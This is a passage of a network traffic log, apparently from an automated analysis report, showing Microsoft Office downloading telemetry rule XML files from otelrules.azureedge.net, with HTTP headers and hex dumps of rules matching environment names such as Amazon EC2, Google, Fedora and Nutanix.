                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            92192.168.2.64983013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:20 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:20 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:20 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 475
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                            x-ms-request-id: c5dbf9be-001e-0017-2cf1-160c3c000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115020Z-1657d5bbd48xdq5dkwwugdpzr000000002a0000000004d2a
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:20 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            93192.168.2.64983613.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:21 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:21 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:21 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 415
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                            x-ms-request-id: 04801829-801e-00ac-6301-17fd65000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115021Z-1657d5bbd48sdh4cyzadbb374800000001wg000000000cap
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            94192.168.2.64983713.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:21 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:21 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:21 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 416
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                            x-ms-request-id: cb78c1b2-201e-003f-2e04-176d94000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115021Z-1657d5bbd48vhs7r2p1ky7cs5w000000028g000000007aha
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:21 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            95192.168.2.64983513.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:21 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:21 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:21 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 479
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                            x-ms-request-id: 27b6de9f-001e-0046-1e00-17da4b000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115021Z-1657d5bbd48vlsxxpe15ac3q7n00000001xg0000000077da
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:21 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            96192.168.2.64983813.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:21 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:21 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:21 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 471
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                            x-ms-request-id: 2f3972b1-401e-0035-1b02-1782d8000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115021Z-1657d5bbd48jwrqbupe3ktsx9w000000022000000000dvud
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            97192.168.2.64983113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:21 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:21 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:21 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 491
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                            x-ms-request-id: 721d8bd8-801e-002a-4f00-1731dc000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115021Z-1657d5bbd482lxwq1dp2t1zwkc00000001t0000000001npv
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:21 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            98192.168.2.64984313.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:22 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:22 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:22 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 477
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                            x-ms-request-id: 27cd2a1a-001e-0046-1b08-17da4b000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115022Z-1657d5bbd48wd55zet5pcra0cg00000001t000000000g6c2
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:22 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            99192.168.2.64984213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:22 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:25 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:25 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                            x-ms-request-id: 3a03d6b9-d01e-0066-52e9-16ea17000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115025Z-1657d5bbd48jwrqbupe3ktsx9w000000020g00000000gsv0
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            100192.168.2.64984113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:22 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:22 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:22 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 477
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                            x-ms-request-id: cde3aec9-601e-0084-63e5-166b3f000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115022Z-1657d5bbd48lknvp09v995n79000000001kg00000000829a
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:22 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            101192.168.2.64984413.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:22 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:22 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:22 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                            x-ms-request-id: 46a5aa72-701e-0032-6004-17a540000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115022Z-1657d5bbd48q6t9vvmrkd293mg00000001tg00000000g8gn
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            102192.168.2.64984013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:23 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:23 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:23 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                            x-ms-request-id: 1ed82642-401e-0048-7b12-170409000000
